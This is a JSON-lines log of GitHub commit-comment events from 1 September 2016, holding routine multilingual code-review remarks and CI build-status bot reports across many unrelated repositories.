{"id":"4500882805","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18859096,"position":9,"line":20,"path":"R/cut.integer.R","commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T07:17:41Z","updated_at":"2016-09-01T07:17:41Z","body":"thought about using ... here only, but the problems would be: \r\n* due to lexical scoping, the function would take all arguments from the global environment if not provided in the function, which is clearly an undesired behavior.\r\n* in the helpfile, it looks not informative if we have only ... \r\n"}},"created_at":"2016-09-01T07:17:41Z"}
{"id":"4500885122","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18859104,"position":9,"line":20,"path":"R/cut.integer.R","commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T07:18:20Z","updated_at":"2016-09-01T07:18:20Z","body":"thought about using ... here only, but the problems would be:\r\n* due to lexical scoping, the function would take all arguments from the global environment if not provided in the function, which is clearly an undesired behavior.\r\n* in the helpfile, it looks not informative if we have only ..."}},"created_at":"2016-09-01T07:18:20Z"}
{"id":"4500885580","type":"CommitCommentEvent","actor":{"login":"Jakuje"},"repo":{"name":"dengert/OpenSC"},"payload":{"comment":{"id":18859107,"position":null,"line":null,"path":null,"commit_id":"740a41b5a82d490ebc39ef22c128b413abede2ca","created_at":"2016-09-01T07:18:27Z","updated_at":"2016-09-01T07:18:27Z","body":"The #852 currently applied inverts the order of the bits in the Key Usage bitfield.\r\nTo be able to use the `SC_PKCS15INIT_X509_*` constants from `pkcs15-init.h`, [this commit](https://github.com/OpenSC/OpenSC/pull/841/commits/eaa85ac6f195a90b64a282a789d560c4c99f898d) is needed (at the moment in #841).\r\nThen you would be able to define the bit mask constants in more readable way (than the inverted one here)."}},"created_at":"2016-09-01T07:18:27Z"}
{"id":"4500885716","type":"CommitCommentEvent","actor":{"login":"kapilv9"},"repo":{"name":"kapilv9/Angularjs"},"payload":{"comment":{"id":18859108,"position":30,"line":65,"path":"app/scripts/app_dishcontroller.js","commit_id":"ff56717c11fab43ce85f3ec81113761d9e3a0d77","created_at":"2016-09-01T07:18:30Z","updated_at":"2016-09-01T07:18:30Z","body":"Using the push method as follow allows successfully pushing the elements into the main function via $scope. "}},"created_at":"2016-09-01T07:18:30Z"}
{"id":"4500888712","type":"CommitCommentEvent","actor":{"login":"Kgneo"},"repo":{"name":"pixelhumain/communecter"},"payload":{"comment":{"id":18859115,"position":5,"line":307,"path":"views/default/menu/multi_scope.php","commit_id":"4996f71d8e925d2541a2c995215da3c62982bd8a","created_at":"2016-09-01T07:19:19Z","updated_at":"2016-09-01T07:19:19Z","body":"une histoire de ST LEU et Saint-Leu. Toujours le pb dont on parlait hier, ça marche dans un sens mais pas dans l'autre et inversement... "}},"created_at":"2016-09-01T07:19:19Z"}
{"id":"4500888783","type":"CommitCommentEvent","actor":{"login":"pliu007"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18859116,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-01T07:19:20Z","updated_at":"2016-09-01T07:19:20Z","body":"Hi,\n\nI am thinking if we can use matlab code only to test instead of MatconvNet.\n\nThe attached file is my code. but it seems not working.\n\ncould you check for me?\n\nOn Wed, Aug 31, 2016 at 4:22 AM, Maxsky <notifications@github.com> wrote:\n\n> Hi, check the new update of caffe-vdsr.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18842873>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIZJ5TjvyWQukl5-o4PDNz5aB9ybeHYGks5qlTm-gaJpZM4JxO8i>\n> .\n>\n"}},"created_at":"2016-09-01T07:19:20Z"}
{"id":"4500889932","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18859120,"position":48,"line":57,"path":"R/cut.integer.R","commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T07:19:41Z","updated_at":"2016-09-01T07:19:41Z","body":"this is complicated but could not find a better approach. We could get rid of b2 and substitute b1 -1 there, but it would reduce readability I think"}},"created_at":"2016-09-01T07:19:41Z"}
{"id":"4500890338","type":"CommitCommentEvent","actor":{"login":"zhujinyu1017"},"repo":{"name":"zhujinyu1017/hello-world"},"payload":{"comment":{"id":18859121,"position":null,"line":null,"path":null,"commit_id":"a6edcaed518877d7c9726723cacb11da10ac621e","created_at":"2016-09-01T07:19:48Z","updated_at":"2016-09-01T07:19:48Z","body":"_****_"}},"created_at":"2016-09-01T07:19:48Z"}
{"id":"4500890407","type":"CommitCommentEvent","actor":{"login":"pepe2k"},"repo":{"name":"pepe2k/u-boot_mod"},"payload":{"comment":{"id":18859122,"position":null,"line":null,"path":null,"commit_id":"3527b8cc2a989e51197831eab1f941429f8ffeea","created_at":"2016-09-01T07:19:49Z","updated_at":"2016-09-01T07:19:49Z","body":"Hello David,\r\n\r\n> If you decide to add it, it obviously would need to be tested across a range of hardware variants. I have tested it only on a couple of our devices at this stage (one faulty prior to this change, and the other which worked fine prior to this change) - both are running fine after the patch.\r\n\r\nThanks for information.\r\nI will make some tests on AR933x and also other platforms, maybe this should be applied everywhere.\r\n\r\n> For testing, I run a CPU/IO/MEM stress test on the device, and then iperf3 to push the wireless side.\r\n\r\nJust one request, could you tell me please what kind of software/method you are using for stress tests? Is it OpenSSL benchmark?"}},"created_at":"2016-09-01T07:19:49Z"}
{"id":"4500894384","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Diogo-Ferreira/opentheater"},"payload":{"comment":{"id":18859131,"position":7,"line":7,"path":"frontend/services/movieService.js","commit_id":"41a04479c29b29393cb7944642aca3378e22040a","created_at":"2016-09-01T07:20:52Z","updated_at":"2016-09-01T07:20:52Z","body":"Angular1 est un sac de nœuds sans fin mais vous gagnerez certainement à utiliser [`$ngResource`](https://docs.angularjs.org/api/ngResource)\r\n\r\nDans l'exemple ci-dessus, publier votre clé TMDb ainsi la rend publique. Vous seriez obliger de créer une passerelle dans votre application express."}},"created_at":"2016-09-01T07:20:52Z"}
{"id":"4500895166","type":"CommitCommentEvent","actor":{"login":"h13ronim"},"repo":{"name":"pr0d1r2/kitchenplan-config"},"payload":{"comment":{"id":18859135,"position":12,"line":16,"path":"config/groups/work.yml","commit_id":"b0cc330eaac577d686142185276681cdceb4d1f2","created_at":"2016-09-01T07:21:06Z","updated_at":"2016-09-01T07:21:06Z","body":"still no the list? 😉 "}},"created_at":"2016-09-01T07:21:06Z"}
{"id":"4500895668","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18859138,"position":13,"line":17,"path":"R/cfactor.R","commit_id":"7f7c2b510ad3b3956717f430b883e0725b40033c","created_at":"2016-09-01T07:21:13Z","updated_at":"2016-09-01T07:21:13Z","body":"maybe we should define that outside cfactor.R and source? As a helper function I mean..."}},"created_at":"2016-09-01T07:21:13Z"}
{"id":"4500907442","type":"CommitCommentEvent","actor":{"login":"cakey"},"repo":{"name":"bessey/pokebooze-elm"},"payload":{"comment":{"id":18859157,"position":25,"line":40,"path":"boardLocation.elm","commit_id":"b33a692716eac6932f0a199544f9416d518b0dbd","created_at":"2016-09-01T07:24:24Z","updated_at":"2016-09-01T07:24:24Z","body":"truly gods work"}},"created_at":"2016-09-01T07:24:24Z"}
{"id":"4500908745","type":"CommitCommentEvent","actor":{"login":"declension"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":18859159,"position":null,"line":null,"path":null,"commit_id":"f74a573754175a2477e74200174abf39700809bb","created_at":"2016-09-01T07:24:45Z","updated_at":"2016-09-01T07:24:45Z","body":"Oops, missed that one. Thanks @lazka "}},"created_at":"2016-09-01T07:24:45Z"}
{"id":"4500908943","type":"CommitCommentEvent","actor":{"login":"xtetsuji"},"repo":{"name":"perl-entrance-org/workshop-2016"},"payload":{"comment":{"id":18859161,"position":26,"line":47,"path":"5th/slide.md","commit_id":"5d384c498d745a6b09513339653049a8795ef40c","created_at":"2016-09-01T07:24:49Z","updated_at":"2016-09-01T07:24:49Z","body":"-L があれば -4 がなくともホスト名として認識するんですね。"}},"created_at":"2016-09-01T07:24:49Z"}
{"id":"4500910083","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18859165,"position":12,"line":12,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T07:25:09Z","updated_at":"2016-09-01T07:25:09Z","body":"Imbibed Philip's comment.\r\nWill include Andrés' comment, and make sure to include that feature in the smsgh-content-service."}},"created_at":"2016-09-01T07:25:09Z"}
{"id":"4500910489","type":"CommitCommentEvent","actor":{"login":"xtetsuji"},"repo":{"name":"perl-entrance-org/workshop-2016"},"payload":{"comment":{"id":18859167,"position":19,"line":44,"path":"5th/slide.md","commit_id":"5d384c498d745a6b09513339653049a8795ef40c","created_at":"2016-09-01T07:25:16Z","updated_at":"2016-09-01T07:25:16Z","body":"4つ→3つかな。"}},"created_at":"2016-09-01T07:25:16Z"}
{"id":"4500911976","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18859181,"position":7,"line":7,"path":"ball_pyramid.py","commit_id":"b801a4452ad330be0842b1ded9aafafef5007d49","created_at":"2016-09-01T07:25:40Z","updated_at":"2016-09-01T07:25:40Z","body":"why use `pow` here if there are these options:\r\n1. `x ** y`\r\n2. `x * x`"}},"created_at":"2016-09-01T07:25:40Z"}
{"id":"4500912052","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18859182,"position":null,"line":null,"path":null,"commit_id":"a4454aa02c189959cebc49a32cd256c5672f9879","created_at":"2016-09-01T07:25:40Z","updated_at":"2016-09-01T07:25:40Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2196 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-89.05%25-red.svg)</a> \n"}},"created_at":"2016-09-01T07:25:40Z"}
{"id":"4500912708","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18859184,"position":23,"line":23,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T07:25:52Z","updated_at":"2016-09-01T07:25:52Z","body":"Checking response code, don't see a reason to check body. I wouldn't be checking that for anything anyway."}},"created_at":"2016-09-01T07:25:52Z"}
{"id":"4500913769","type":"CommitCommentEvent","actor":{"login":"qknight"},"repo":{"name":"zimbatm/nixpkgs"},"payload":{"comment":{"id":18859188,"position":null,"line":null,"path":null,"commit_id":"db3de7a900835e614c304bbeed78bcacd8048b03","created_at":"2016-09-01T07:26:11Z","updated_at":"2016-09-01T07:26:11Z","body":"will have to fix a few other things as well. thanks for pointing this one out!"}},"created_at":"2016-09-01T07:26:11Z"}
{"id":"4500914116","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18859191,"position":null,"line":null,"path":null,"commit_id":"b801a4452ad330be0842b1ded9aafafef5007d49","created_at":"2016-09-01T07:26:16Z","updated_at":"2016-09-01T07:26:16Z","body":"good job, congrats anyways"}},"created_at":"2016-09-01T07:26:16Z"}
{"id":"4500914265","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18859193,"position":36,"line":36,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T07:26:19Z","updated_at":"2016-09-01T07:26:19Z","body":"Imbibed it here, and in other places like this.\r\n"}},"created_at":"2016-09-01T07:26:19Z"}
{"id":"4500916208","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18859199,"position":4,"line":243,"path":"tabbycat/results/forms.py","commit_id":"5fb984b8719ccf911c13ec839bc9ed77e8ee93a1","created_at":"2016-09-01T07:26:50Z","updated_at":"2016-09-01T07:26:50Z","body":"@philipbelesky Just checking, is the `required` class (not attribute) still needed on these?"}},"created_at":"2016-09-01T07:26:50Z"}
{"id":"4500917639","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18859204,"position":12,"line":12,"path":"ball_pyramid.py","commit_id":"b801a4452ad330be0842b1ded9aafafef5007d49","created_at":"2016-09-01T07:27:14Z","updated_at":"2016-09-01T07:27:14Z","body":"`+` for using `.format` instead of `%`"}},"created_at":"2016-09-01T07:27:14Z"}
{"id":"4500922066","type":"CommitCommentEvent","actor":{"login":"sglfree"},"repo":{"name":"freesgl/gofreesky"},"payload":{"comment":{"id":18859209,"position":null,"line":null,"path":null,"commit_id":"54ab64a4d49b2493f40463e440cfab8832397d51","created_at":"2016-09-01T07:28:18Z","updated_at":"2016-09-01T07:28:18Z","body":"![intro](https://cloud.githubusercontent.com/assets/4660586/18158887/99c93dd6-7058-11e6-9b3f-c9557711974c.jpg)\r\n"}},"created_at":"2016-09-01T07:28:18Z"}
{"id":"4500922578","type":"CommitCommentEvent","actor":{"login":"swansea679"},"repo":{"name":"Chainfire/libsuperuser"},"payload":{"comment":{"id":18859213,"position":null,"line":null,"path":null,"commit_id":"7a67d3068ddc077b55f66201ccb935284f76cc97","created_at":"2016-09-01T07:28:26Z","updated_at":"2016-09-01T07:28:26Z","body":"7a67d30"}},"created_at":"2016-09-01T07:28:26Z"}
{"id":"4500923274","type":"CommitCommentEvent","actor":{"login":"Illyohs"},"repo":{"name":"Illyohs/SparkyForge"},"payload":{"comment":{"id":18859214,"position":80,"line":80,"path":"src/main/java/us/illyohs/sparkyforge/bots/github/GitHubBot.java","commit_id":"a58a71e469cd91364f6470aa1abd92096cc2784b","created_at":"2016-09-01T07:28:37Z","updated_at":"2016-09-01T07:28:37Z","body":"Need to fix this logic"}},"created_at":"2016-09-01T07:28:37Z"}
{"id":"4500926400","type":"CommitCommentEvent","actor":{"login":"v0lat1le"},"repo":{"name":"data-cube/agdc-v2"},"payload":{"comment":{"id":18859228,"position":36,"line":36,"path":"datacube/analysis.py","commit_id":"99dac0db14e1690a7398e1872d69d27e1e3c1901","created_at":"2016-09-01T07:29:29Z","updated_at":"2016-09-01T07:29:29Z","body":"this shouldn't exist... learn to xarray"}},"created_at":"2016-09-01T07:29:29Z"}
{"id":"4500926637","type":"CommitCommentEvent","actor":{"login":"stereodenis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18859229,"position":12,"line":85,"path":"Examples/UIExplorer/js/TextExample.ios.js","commit_id":"c6b6f53ae7d5196bc89c5e71c20ffc3630ae0817","created_at":"2016-09-01T07:29:31Z","updated_at":"2016-09-01T07:29:31Z","body":"why it's not in es6 style?"}},"created_at":"2016-09-01T07:29:31Z"}
{"id":"4500929352","type":"CommitCommentEvent","actor":{"login":"lfairy"},"repo":{"name":"lfairy/maud"},"payload":{"comment":{"id":18859239,"position":null,"line":null,"path":null,"commit_id":"5fa9aeae839eec554f704114502e8679c6571161","created_at":"2016-09-01T07:30:16Z","updated_at":"2016-09-01T07:30:16Z","body":"```rust\r\nhtml!(w, {\r\n    @(Column::width_and_margin(10, 1)) {\r\n        p \"Hello, world!\"\r\n    }\r\n})\r\n```\r\n\r\nbecomes\r\n\r\n```rust\r\nmatch &mut Column::with_and_margin(w).into_wrapper()? {\r\n    w => {\r\n        w.write_str(\"<p>Hello, world!</p>\")?;\r\n        w.finish()?;\r\n    }\r\n}\r\n```"}},"created_at":"2016-09-01T07:30:16Z"}
{"id":"4500929670","type":"CommitCommentEvent","actor":{"login":"nestycoder87"},"repo":{"name":"newswim/level-up-react"},"payload":{"comment":{"id":18859240,"position":null,"line":null,"path":null,"commit_id":"1cb10f4f6d3a4147b3b5e80933166eac0d994f38","created_at":"2016-09-01T07:30:21Z","updated_at":"2016-09-01T07:30:21Z","body":"fix a typo, its Contacts.js"}},"created_at":"2016-09-01T07:30:21Z"}
{"id":"4500934043","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"rtyx/Berlin-Web"},"payload":{"comment":{"id":18859248,"position":null,"line":null,"path":null,"commit_id":"7cd0d3dbb2d72bb65e675fb5990a829ada21592e","created_at":"2016-09-01T07:31:29Z","updated_at":"2016-09-01T07:31:29Z","body":"looks good! you should make sure your .gitconfig file has the correct info so your user info is displayed on github."}},"created_at":"2016-09-01T07:31:29Z"}
{"id":"4500935408","type":"CommitCommentEvent","actor":{"login":"xlazom00"},"repo":{"name":"xlazom00/hls.js"},"payload":{"comment":{"id":18859253,"position":479,"line":877,"path":"src/demux/tsdemuxer.js","commit_id":"db6a87552e6b07ec36eb952b2eb700fb000149ca","created_at":"2016-09-01T07:31:49Z","updated_at":"2016-09-01T07:31:49Z","body":"it is different in here \r\nNALs in H265 have different type coding( H265 has more types then H264)\r\nhttps://cgit.freedesktop.org/gstreamer/gst-plugins-bad/tree/gst-libs/gst/codecparsers/gsth265parser.c#n252"}},"created_at":"2016-09-01T07:31:49Z"}
{"id":"4500941152","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18859287,"position":null,"line":null,"path":null,"commit_id":"ee02cc0befbab1dc6207e8dda177184f9d5750b3","created_at":"2016-09-01T07:33:18Z","updated_at":"2016-09-01T07:33:18Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee02cc0befbab1dc6207e8dda177184f9d5750b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-01T07:33:18Z"}
{"id":"4500941816","type":"CommitCommentEvent","actor":{"login":"omad"},"repo":{"name":"data-cube/agdc-v2"},"payload":{"comment":{"id":18859289,"position":36,"line":36,"path":"datacube/analysis.py","commit_id":"99dac0db14e1690a7398e1872d69d27e1e3c1901","created_at":"2016-09-01T07:33:30Z","updated_at":"2016-09-01T07:33:30Z","body":"Mmm?"}},"created_at":"2016-09-01T07:33:30Z"}
{"id":"4500942036","type":"CommitCommentEvent","actor":{"login":"jfr3000"},"repo":{"name":"thiloo/sprint-berlin"},"payload":{"comment":{"id":18859294,"position":null,"line":null,"path":null,"commit_id":"de46d6a5510b760002a6cdb67843bc35f3d31541","created_at":"2016-09-01T07:33:34Z","updated_at":"2016-09-01T07:33:34Z","body":"looks good to me! you should make sure your .gitconfig file has the correct name and email in it so your user info gets displayed here on GitHub."}},"created_at":"2016-09-01T07:33:34Z"}
{"id":"4500942466","type":"CommitCommentEvent","actor":{"login":"davsclaus"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":18859297,"position":4,"line":109,"path":"components/camel-spring-boot/pom.xml","commit_id":"9ac4768eedacd7ec89cbf7faf80dab35f3154481","created_at":"2016-09-01T07:33:39Z","updated_at":"2016-09-01T07:33:39Z","body":"Why do you do this?"}},"created_at":"2016-09-01T07:33:39Z"}
{"id":"4500946283","type":"CommitCommentEvent","actor":{"login":"v0lat1le"},"repo":{"name":"data-cube/agdc-v2"},"payload":{"comment":{"id":18859313,"position":36,"line":36,"path":"datacube/analysis.py","commit_id":"99dac0db14e1690a7398e1872d69d27e1e3c1901","created_at":"2016-09-01T07:34:40Z","updated_at":"2016-09-01T07:34:40Z","body":"this does nothing, but call reduce"}},"created_at":"2016-09-01T07:34:40Z"}
{"id":"4500947244","type":"CommitCommentEvent","actor":{"login":"qsm-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":18859314,"position":null,"line":null,"path":null,"commit_id":"22afcf245a9292240c0023d7b941f2c16294f5f8","created_at":"2016-09-01T07:34:55Z","updated_at":"2016-09-01T07:34:55Z","body":":+1: "}},"created_at":"2016-09-01T07:34:55Z"}
{"id":"4500947518","type":"CommitCommentEvent","actor":{"login":"v0lat1le"},"repo":{"name":"data-cube/agdc-v2"},"payload":{"comment":{"id":18859316,"position":36,"line":36,"path":"datacube/analysis.py","commit_id":"99dac0db14e1690a7398e1872d69d27e1e3c1901","created_at":"2016-09-01T07:34:59Z","updated_at":"2016-09-01T07:34:59Z","body":"and hides performance penalties"}},"created_at":"2016-09-01T07:34:59Z"}
{"id":"4500947630","type":"CommitCommentEvent","actor":{"login":"davsclaus"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":18859317,"position":4,"line":188,"path":"components/camel-spring-boot/src/main/java/org/apache/camel/spring/boot/CamelAutoConfiguration.java","commit_id":"9ac4768eedacd7ec89cbf7faf80dab35f3154481","created_at":"2016-09-01T07:35:01Z","updated_at":"2016-09-01T07:35:01Z","body":"Why was this code needed? This will confuse people, we should add some code comment why this is done"}},"created_at":"2016-09-01T07:35:01Z"}
{"id":"4500951690","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18859329,"position":null,"line":null,"path":null,"commit_id":"9f6ca06eb113d4378c524b5867b30083e8c2d83e","created_at":"2016-09-01T07:36:09Z","updated_at":"2016-09-01T07:36:09Z","body":"Weren't you going to squash this one into the original commit?"}},"created_at":"2016-09-01T07:36:09Z"}
{"id":"4500952968","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18859331,"position":null,"line":null,"path":null,"commit_id":"fa76e9b0149285d3887d8dac163b5153555af458","created_at":"2016-09-01T07:36:28Z","updated_at":"2016-09-01T07:36:28Z","body":"EP-6-6 (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T07:36:28Z"}
{"id":"4500957695","type":"CommitCommentEvent","actor":{"login":"omad"},"repo":{"name":"data-cube/agdc-v2"},"payload":{"comment":{"id":18859354,"position":36,"line":36,"path":"datacube/analysis.py","commit_id":"99dac0db14e1690a7398e1872d69d27e1e3c1901","created_at":"2016-09-01T07:37:41Z","updated_at":"2016-09-01T07:37:41Z","body":"It combines the data variables of a Dataset into a single ndarray before calling reduce(), then separates them back out and keeps the attributes.\r\nAren't separate data variables separate ndarrays under the xarray hood?"}},"created_at":"2016-09-01T07:37:41Z"}
{"id":"4500959163","type":"CommitCommentEvent","actor":{"login":"freesgl"},"repo":{"name":"freesgl/gofreesky"},"payload":{"comment":{"id":18859365,"position":null,"line":null,"path":null,"commit_id":"54ab64a4d49b2493f40463e440cfab8832397d51","created_at":"2016-09-01T07:38:03Z","updated_at":"2016-09-01T07:38:03Z","body":"![intro](https://cloud.githubusercontent.com/assets/6301435/18159104/b46b5600-7059-11e6-8d82-481c37c88fa4.jpg)\r\n"}},"created_at":"2016-09-01T07:38:03Z"}
{"id":"4500960209","type":"CommitCommentEvent","actor":{"login":"Draveness"},"repo":{"name":"xiangyaguo/DKNightVersion"},"payload":{"comment":{"id":18859369,"position":29,"line":68,"path":"DKNightVersion/Manual/UISearchBar+Keyboard.m","commit_id":"30b46d2fdec15739f7c6545265fbecbd657ee9d9","created_at":"2016-09-01T07:38:18Z","updated_at":"2016-09-01T07:38:18Z","body":"这个方法不用删么"}},"created_at":"2016-09-01T07:38:18Z"}
{"id":"4500960911","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18859374,"position":null,"line":null,"path":null,"commit_id":"c423bd22061107de682f0f21bf834b35660ddece","created_at":"2016-09-01T07:38:28Z","updated_at":"2016-09-01T07:38:28Z","body":"You need to remove the \"Cr-Position\" lines from the commit message -- see https://github.com/crosswalk-project/crosswalk-website/wiki/Rebasing-our-forks#a-special-note-about-chromium-crosswalk-backports\r\n\r\nI haven't found a way to check for this automatically yet..."}},"created_at":"2016-09-01T07:38:28Z"}
{"id":"4500961431","type":"CommitCommentEvent","actor":{"login":"karthiksbhat"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18859376,"position":60,"line":60,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T07:38:36Z","updated_at":"2016-09-01T07:38:36Z","body":"This was fixed in the next commit."}},"created_at":"2016-09-01T07:38:36Z"}
{"id":"4500964502","type":"CommitCommentEvent","actor":{"login":"rakuco"},"repo":{"name":"crosswalk-project/chromium-crosswalk"},"payload":{"comment":{"id":18859386,"position":null,"line":null,"path":null,"commit_id":"8ee58501868658829af432f41958c2f3ee07f387","created_at":"2016-09-01T07:39:21Z","updated_at":"2016-09-01T07:39:21Z","body":"It's OK to leave this as-is, but my original suggestion when I created the PR was to just squash it into the original commit."}},"created_at":"2016-09-01T07:39:21Z"}
{"id":"4500965954","type":"CommitCommentEvent","actor":{"login":"danielgustafsson"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":18859391,"position":4,"line":258,"path":"gpMgmt/bin/gppylib/operations/package.py","commit_id":"f848884920895156a2620fecc80f03fe7bf6b762","created_at":"2016-09-01T07:39:43Z","updated_at":"2016-09-01T07:39:43Z","body":"Reverted and replaced in 5e42b17311681d091ba1c8b3fcf65c4b4c9b9a17"}},"created_at":"2016-09-01T07:39:43Z"}
{"id":"4500967596","type":"CommitCommentEvent","actor":{"login":"7t7t"},"repo":{"name":"7t7t/bsweb"},"payload":{"comment":{"id":18859396,"position":2,"line":2,"path":"README.md","commit_id":"f8af839182d171c3d88b639fe0f73a7a094b069d","created_at":"2016-09-01T07:40:11Z","updated_at":"2016-09-01T07:40:11Z","body":"i qca i qca"}},"created_at":"2016-09-01T07:40:11Z"}
{"id":"4500969946","type":"CommitCommentEvent","actor":{"login":"xiweidu"},"repo":{"name":"xiweidu/android_test2"},"payload":{"comment":{"id":18859398,"position":null,"line":null,"path":null,"commit_id":"45b10ee5238cae8275a8054668e39e236edfd0b3","created_at":"2016-09-01T07:40:44Z","updated_at":"2016-09-01T07:40:44Z","body":"keyi "}},"created_at":"2016-09-01T07:40:44Z"}
{"id":"4500970225","type":"CommitCommentEvent","actor":{"login":"sbellity"},"repo":{"name":"hull-ships/hull-mailchimp"},"payload":{"comment":{"id":18859399,"position":69,"line":324,"path":"server/lib/mailchimp-agent.js","commit_id":"bd50a11dbafc4b0972b469302c75ed8ed101b692","created_at":"2016-09-01T07:40:49Z","updated_at":"2016-09-01T07:40:49Z","body":"Did they change their API ?\r\nLast time I checked, trying to PUT on a non existing member returned an error..."}},"created_at":"2016-09-01T07:40:49Z"}
{"id":"4500970803","type":"CommitCommentEvent","actor":{"login":"snaewe"},"repo":{"name":"landstander668/git"},"payload":{"comment":{"id":18859401,"position":null,"line":null,"path":null,"commit_id":"7d60c2c9d3206b64d66f1a4652a94aaa00be9dc6","created_at":"2016-09-01T07:40:58Z","updated_at":"2016-09-01T07:40:58Z","body":"Actually I meant `gcc -v`. That should give the target as output as well."}},"created_at":"2016-09-01T07:40:58Z"}
